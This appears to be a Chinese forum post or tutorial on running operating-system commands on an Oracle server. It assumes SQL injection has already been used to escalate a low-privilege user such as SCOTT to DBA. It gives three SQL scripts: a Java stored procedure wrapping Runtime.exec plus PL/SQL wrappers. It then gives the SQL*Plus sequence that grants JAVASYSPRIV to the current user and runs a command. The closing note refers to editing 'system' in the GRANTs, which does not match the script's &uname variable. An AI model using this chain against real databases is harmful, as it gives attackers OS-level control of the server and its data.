前奏:

前提: 需要先以具有 RESOURCE 角色的用户(例如 SCOTT)登录 Oracle, 并利用 SQL 注入提权到 DBA 权限。后面的 GRANT JAVASYSPRIV / JAVAUSERPRIV 语句需要 DBA 级别的授权权限, 否则会一直报权限不足。

网上流传着一种通过 Java 存储过程执行 OS 命令的方法, 分为三个脚本:

c:\1.sql
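create or replace and compile
java source named "util"
as
import java.io.*;
import java.lang.*;
// Helper class for running an OS command from PL/SQL.  The child process is
// started by the JVM embedded in the Oracle server, i.e. with the OS identity
// of the database server process, so anyone able to call RunThis effectively
// has that account: keep the PL/SQL wrappers around it private.
public class util extends Object
{
    // Copies everything readable from in to System.out.  SQL*Plus shows that
    // output once dbms_java.set_output has been called in the session.
    // The stream is always closed, even when the read loop fails.
    private static void pump(InputStream in) throws IOException
    {
        int bufSize = 4096;
        byte buffer[] = new byte[bufSize];
        BufferedInputStream bis = new BufferedInputStream(in, bufSize);
        try
        {
            int len;
            while ((len = bis.read(buffer, 0, bufSize)) != -1)
                System.out.write(buffer, 0, len);
        }
        finally
        {
            bis.close();
        }
    }
    // Runs args via Runtime.exec(String).  Java splits the string on
    // whitespace itself, no shell is involved, so pipes and redirects only
    // work with an explicit cmd.exe /c or /bin/sh -c prefix.
    // Stdout and then stderr of the child are echoed to System.out.
    // Returns the exit code of the child, or -1 when exec fails or the wait
    // is interrupted (the stack trace goes to System.err).
    public static int RunThis(String args)
    {
        Runtime rt = Runtime.getRuntime();
        int RC = -1;
        try
        {
            Process p = rt.exec(args);
            // Drain stdout first, then stderr.  Reading stderr as well keeps
            // the child from blocking on a full error pipe in the common case
            // and surfaces error messages that would otherwise be lost.
            // A command that floods stderr while stdout is still open can
            // still block; on JVMs that have ProcessBuilder, merging the two
            // streams with redirectErrorStream(true) removes that case.
            pump(p.getInputStream());
            pump(p.getErrorStream());
            RC = p.waitFor();
        }
        catch (Exception e)
        {
            e.printStackTrace();
            RC = -1;
        }
        // Return outside of finally: a return statement inside a finally
        // block silently discards any Throwable raised in try or catch.
        return RC;
    }
}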

c:\2.sql

create or replace
function RUN_CMz(p_cmd in varchar2) return number
is
-- PL/SQL call specification for util.RunThis (defined in 1.sql): hands the
-- command string to Java and maps its int exit code onto NUMBER.
-- A value of -1 means the Java side failed before or during waitFor().
language java name 'util.RunThis(java.lang.String) return integer';

c:\3.sql

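-- Convenience wrapper around RUN_CMz so a command can be run with
-- "exec RC('...')" without declaring a bind variable for the exit code.
-- varchar2 replaces varchar: Oracle treats them as the same type today but
-- documents varchar as reserved for a future change in semantics.
create or replace procedure RC(p_cmd in varchar2)
as
x number;
begin
x := RUN_CMz(p_cmd);
-- Print the exit code instead of discarding it, so a non-zero status
-- (command not found, access denied, ...) is visible to the caller.
-- Needs "set serveroutput on" in the session for the line to show up.
dbms_output.put_line('RC exit code: ' || x);
end;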

登录后仍按顺序依次执行下面的命令(每个脚本之后单独一行的 / 用来执行前一条 CREATE 语句):

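SQL> @c:\1.sql
/
@c:\2.sql
/
@c:\3.sql
/
-- Bind variable that receives the exit code of the command run below.
variable x number;
-- Both settings are needed to see the Java System.out text in SQL*Plus:
-- serveroutput provides the buffer, set_output routes Java output into it
-- (same 100000 byte size for both so nothing is truncated).
set serveroutput on size 100000
exec dbms_java.set_output(100000);
-- Grant the Java privilege roles to whichever account this session is
-- logged in as.  The name is read from USER instead of being hard-coded,
-- so the script no longer has to be edited per login user.
-- JAVASYSPRIV amounts to OS-level access through the database: issuing
-- these GRANTs needs DBA-level rights, and a role granted to the current
-- user is not enabled in the current session - reconnect (or try SET ROLE)
-- before calling run_cmz, otherwise Oracle keeps reporting missing privileges.
set verify off
column uname new_value uname noprint
select user uname from dual;
grant javasyspriv to &uname;
grant javauserpriv to &uname;
exec :x := run_cmz('ipconfig');
-- Show the exit code: -1 means the Java side failed before waitFor().
print x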
 

注意: 最后加亮的两句 GRANT 里的 system 要改成你实际登录的用户名, 比如用 scott 登录就改为 scott。另外, 角色授予当前用户后在当前会话里不会立即启用, 所以如果第一次执行报权限不足, 要退出后重新登录再按顺序执行, 否则 Oracle 会一直提示权限不够。